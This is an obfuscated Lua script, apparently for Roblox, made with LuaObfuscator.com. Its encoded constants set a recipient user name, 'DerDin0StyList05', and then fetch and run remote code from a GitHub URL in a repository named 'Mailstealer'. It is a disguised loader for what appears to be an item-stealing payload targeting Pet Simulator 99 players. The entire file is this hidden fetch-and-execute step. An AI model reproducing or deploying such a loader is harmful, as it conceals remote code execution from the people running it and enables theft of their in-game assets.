--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v70=v2(v0(v30,16));if v19 then local v77=0;local v78;while true do if (v77==1) then return v78;end if (v77==0) then v78=v5(v70,v19);v19=nil;v77=1;end end else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=(v31/((879 -(282 + 595))^(v32-1)))%((5 -(1640 -(1523 + 114)))^(((v33-(2 -1)) -(v32-1)) + (1 -0))) ;return v71-(v71%(2 -1)) ;else local v72=619 -(555 + 64) ;local v73;while true do if (v72==(931 -(857 + 74))) then v73=(570 -(367 + 201))^(v32-(928 -(214 + 641 + 72))) ;return (((v31%(v73 + v73))>=v73) and (1 + 0)) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23()local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(118 -(32 + 85))) then return (v41 * (16441815 + 335401)) + (v40 * (14533 + 51003)) + (v39 * (1213 -(892 + 65))) + v38 ;end if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + (354 -(87 + 263)) ;v37=1 -0 ;end end end local function v24()local v42=180 -(67 + 113) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(3 + 0)) then if (v47==(0 -0)) then if (v46==0) then return v48 * 0 ;else v47=1 + 0 ;v45=0 -0 ;end elseif (v47==((1288 + 1711) -((1418 -616) + 150))) then return ((v46==(0 -(438 -(145 + 293)))) and (v48 * ((1 -(430 -(44 + 386)))/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(2020 -(915 + 82)) ) * (v45 + (v46/((5 -3)^(31 + 21)))) ;end if (v42==(2 -0)) then v47=v20(v44,1208 -(1069 + (1604 -(998 + 488))) ,70 -39 );v48=((v20(v44,69 -37 )==(1 + 0)) and  -(1 -0)) or (1 + 0) ;v42=794 -(368 + 423) ;end if (v42==(3 -2)) then v45=(7 + 12) -(10 + 8) ;v46=(v20(v44,1,20) * ((7 -5)^((389 + 85) -(416 + (798 -(201 + 571)))))) + v43 ;v42=1140 -(116 + 1022) ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=1;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v68=1 + 0 , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==2) then v57=nil;v58=nil;v52=3;end if (v52==1) then v55=nil;v56=nil;v52=2;end if ((1555 -(226 + 1325))~=v52) then else while true do if (v53~=(0 + 0)) then else v54=0;v55=nil;v53=1;end if (v53==3) then v60=nil;while true do local v96=0 + 0 ;local v97;while true do if (v96~=0) then else v97=0 + 0 ;while true do if (v97==(0 -0)) then local v124=0 -0 ;local v125;while true do if (v124==(0 + 0)) then v125=1636 -(1373 + 263) ;while true do if (v125==(1001 -(451 + 549))) then v97=1 + 0 ;break;end if (0~=v125) then else local v166=0 -0 ;while true do if (v166~=0) then else if (v54==(2 -0)) then local v171=1384 -(746 + 638) ;while true do if (v171~=1) then else for v175=1 + 0 ,v23() do local v176=0 -0 ;local v177;local v178;local v179;while true do if (v176==(341 -(218 + 123))) then v177=0;v178=nil;v176=1582 -(1535 + 46) ;end if (v176~=(1 + 0)) then else v179=nil;while true do if (1==v177) then while true do if (0~=v178) then else v179=v21();if (v20(v179,1,1 + 0 )==0) then local v188=0;local v189;local v190;local v191;local v192;local v193;while true do if (v188==(562 -(306 + 254))) then v193=nil;while true do if (v189~=(0 + 0)) then else local v198=0;while true do if (1~=v198) then else v189=1 -0 ;break;end if (v198~=0) then else v190=0;v191=nil;v198=1468 -(899 + 568) ;end end end if (v189==(1 + 0)) then local v199=0 -0 ;while true do if (v199==(604 -(268 + 335))) then v189=2;break;end if (v199==(290 -(60 + 230))) then v192=nil;v193=nil;v199=573 -(426 + 146) ;end end end if (v189~=2) then else while true do if (v190==(1 + 0)) then local v200=0;local v201;while true do if (v200==0) then v201=0;while true do if (v201~=(1457 -(282 + 1174))) then else v190=2;break;end if (v201==(811 -(569 + 242))) then local v213=0 -0 ;while true do if (v213==1) then v201=1;break;end if (v213==(0 + 0)) then v193={v22(),v22(),nil,nil};if (v191==0) then local v216=1251 -(721 + 530) ;local v217;while true do if (v216==0) then v217=1271 -(945 + 326) ;while true do if ((0 -0)==v217) then v193[3 + 0 ]=v22();v193[704 -(271 + 429) ]=v22();break;end end break;end end elseif (v191==(1 + 0)) then v193[3]=v23();elseif (v191==(1502 -(1408 + 92))) then v193[1089 -(461 + 625) ]=v23() -((1290 -(993 + 295))^(1 + 15)) ;elseif (v191~=(1174 -(418 + 753))) then else local v222=0;local v223;while true do if (v222~=(0 + 0)) then else v223=0;while true do if (0==v223) then v193[3]=v23() -(2^(2 + 14)) ;v193[4]=v22();break;end end break;end end end v213=1 + 0 ;end end end end break;end end end if ((0 + 0)~=v190) then else local v202=0;local v203;while true do if ((529 -(406 + 123))==v202) then v203=1769 -(1749 + 20) ;while true do if (v203==(1 + 0)) then v190=1323 -(1249 + 73) ;break;end if (v203~=(0 + 0)) then else local v214=0;while true do if ((1145 -(466 + 679))==v214) then local v215=0;while true do if (v215~=(0 -0)) then else v191=v20(v179,2,3);v192=v20(v179,4,17 -11 );v215=1;end if (v215==(1901 -(106 + 1794))) then v214=1;break;end end end if (v214~=(1 + 0)) then else v203=1 + 0 ;break;end end end end break;end end end if (v190==2) then local v204=0 -0 ;while true do if (1==v204) then v190=3;break;end if (v204~=0) then else if (v20(v192,2 -1 ,1)~=(115 -(4 + 110))) then else v193[2]=v60[v193[586 -(57 + 527) ]];end if (v20(v192,2,2)==1) then v193[1430 -(41 + 1386) ]=v60[v193[3]];end v204=104 -(17 + 86) ;end end end if (v190==(3 + 0)) then if (v20(v192,3,6 -3 )~=1) then else v193[11 -7 ]=v60[v193[4]];end v55[v175]=v193;break;end end break;end end break;end if (v188~=(166 -(122 + 44))) then else v189=0 -0 ;v190=nil;v188=3 -2 ;end if (v188==(1 + 0)) then v191=nil;v192=nil;v188=1 + 1 ;end end end break;end end break;end if (v177==0) then local v187=0 -0 ;while true do if ((65 -(30 + 35))==v187) then v178=0 + 0 ;v179=nil;v187=1258 -(1043 + 214) ;end if (v187==1) then v177=3 -2 ;break;end end end end break;end end end v54=3;break;end if (0~=v171) then else local v173=1212 -(323 + 889) ;while true do if (v173~=1) then else v171=2 -1 ;break;end if (v173==0) then for v181=581 -(361 + 219) ,v59 do local v182=0;local v183;local v184;local v185;local v186;while true do if (v182==0) then v183=0;v184=nil;v182=1;end if (2~=v182) then else while true do if (v183==(320 -(53 + 267))) then v184=0 + 0 ;v185=nil;v183=414 -(15 + 398) ;end if (v183==(983 -(18 + 964))) then v186=nil;while true do if (v184~=(0 -0)) then else local v194=0;while true do if (v194==1) then v184=1 + 0 ;break;end if ((0 + 0)==v194) then local v196=850 -(20 + 830) ;local v197;while true do if (v196==0) then v197=0;while true do if ((1 + 0)==v197) then v194=1;break;end if (v197==(126 -(116 + 10))) then local v206=0 + 0 ;while true do if (v206~=(739 -(542 + 196))) then else v197=1 -0 ;break;end if ((0 + 0)~=v206) then else v185=v21();v186=nil;v206=1 + 0 ;end end end end break;end end end end end if (v184==1) then if (v185==(1 + 0)) then v186=v21()~=(0 -0) ;elseif (v185==(4 -2)) then v186=v24();elseif (v185~=3) then else v186=v25();end v60[v181]=v186;break;end end break;end end break;end if (v182==(1552 -(1126 + 425))) then v185=nil;v186=nil;v182=407 -(118 + 287) ;end end end v58[11 -8 ]=v21();v173=1122 -(118 + 1003) ;end end end end end if (v54==0) then local v172=0 -0 ;while true do if (v172==0) then local v174=377 -(142 + 235) ;while true do if ((0 -0)~=v174) then else v55={};v56={};v174=1;end if (v174==(1 + 0)) then v172=978 -(553 + 424) ;break;end end end if (v172==1) then v57={};v54=1 -0 ;break;end end end v166=1;end if (v166==1) then v125=1 + 0 ;break;end end end end break;end end end if (v97~=1) then else if (v54==3) then local v153=0;local v154;while true do if (v153~=(0 + 0)) then else v154=0;while true do if (v154==0) then for v169=1,v23() do v56[v169-(1 + 0) ]=v28();end return v58;end end break;end end end if (v54~=1) then else local v155=0 + 0 ;local v156;while true do if (v155==0) then v156=0 + 0 ;while true do if ((0 -0)==v156) then local v167=0 -0 ;local v168;while true do if (v167~=0) then else v168=0 -0 ;while true do if (v168~=1) then else v156=1 + 0 ;break;end if (0==v168) then v58={v55,v56,nil,v57};v59=v23();v168=4 -3 ;end end break;end end end if (v156~=1) then else v60={};v54=755 -(239 + 514) ;break;end end break;end end end break;end end break;end end end break;end if (v53==2) then v58=nil;v59=nil;v53=2 + 1 ;end if (v53==(1330 -(797 + 532))) then v56=nil;v57=nil;v53=2;end end break;end if (0==v52) then v53=0;v54=nil;v52=1;end if (v52~=(3 + 0)) then else v59=nil;v60=nil;v52=2 + 2 ;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v79=v65;local v80=v66;local v81=v67;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=4) then if (v92<=1) then if (v92==0) then v89[v91[2]]=v91[3];else local v104=v91[2];local v105,v106=v82(v89[v104](v13(v89,v104 + 1 ,v91[3])));v84=(v106 + v104) -1 ;local v107=0;for v121=v104,v84 do v107=v107 + 1 ;v89[v121]=v105[v107];end end elseif (v92<=2) then v63[v91[3]]=v89[v91[2]];elseif (v92>3) then v89[v91[2]]();else v89[v91[2]]=v91[3]~=0 ;end elseif (v92<=6) then if (v92>5) then if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v63;else v89[v91[2]]=v63[v91[3]];end else local v110=v91[2];local v111=v89[v91[3]];v89[v110 + 1 ]=v111;v89[v110]=v111[v91[4]];end elseif (v92<=7) then local v115=0;local v116;local v117;local v118;local v119;local v120;while true do if (v115==8) then for v157=v120,v84 do v116=v116 + 1 ;v89[v157]=v117[v116];end v83=v83 + 1 ;v91=v79[v83];v120=v91[2];v115=9;end if (v115==6) then v91=v79[v83];v89[v91[2]]=v91[3]~=0 ;v83=v83 + 1 ;v91=v79[v83];v115=7;end if (v115==9) then v89[v120]=v89[v120](v13(v89,v120 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();break;end if (v115==1) then v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v63[v91[3]]=v89[v91[2]];v115=2;end if (v115==7) then v120=v91[2];v117,v118=v82(v89[v120](v13(v89,v120 + 1 ,v91[3])));v84=(v118 + v120) -1 ;v116=0;v115=8;end if (v115==0) then v116=nil;v117,v118=nil;v119=nil;v120=nil;v115=1;end if (v115==5) then v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v115=6;end if (v115==4) then v120=v91[2];v119=v89[v91[3]];v89[v120 + 1 ]=v119;v89[v120]=v119[v91[4]];v115=5;end if (v115==2) then v83=v83 + 1 ;v91=v79[v83];if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v63;else v89[v91[2]]=v63[v91[3]];end v83=v83 + 1 ;v115=3;end if (v115==3) then v91=v79[v83];if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v63;else v89[v91[2]]=v63[v91[3]];end v83=v83 + 1 ;v91=v79[v83];v115=4;end end elseif (v92==8) then do return;end else local v130=v91[2];v89[v130]=v89[v130](v13(v89,v130 + 1 ,v84));end v83=v83 + 1 ;end end;end if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!063O0003043O007573657203103O0044657244696E305374794C6973743035030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6D2O61726C2O6F77312F4D61696C737465616C65722F6D61696E2F70732O392E747874000B3O0012073O00023O00124O00013O00124O00033O00122O000100043O00202O00010001000500122O000300066O000400016O000100049O0000026O000100012O00083O00017O00",v9(),...);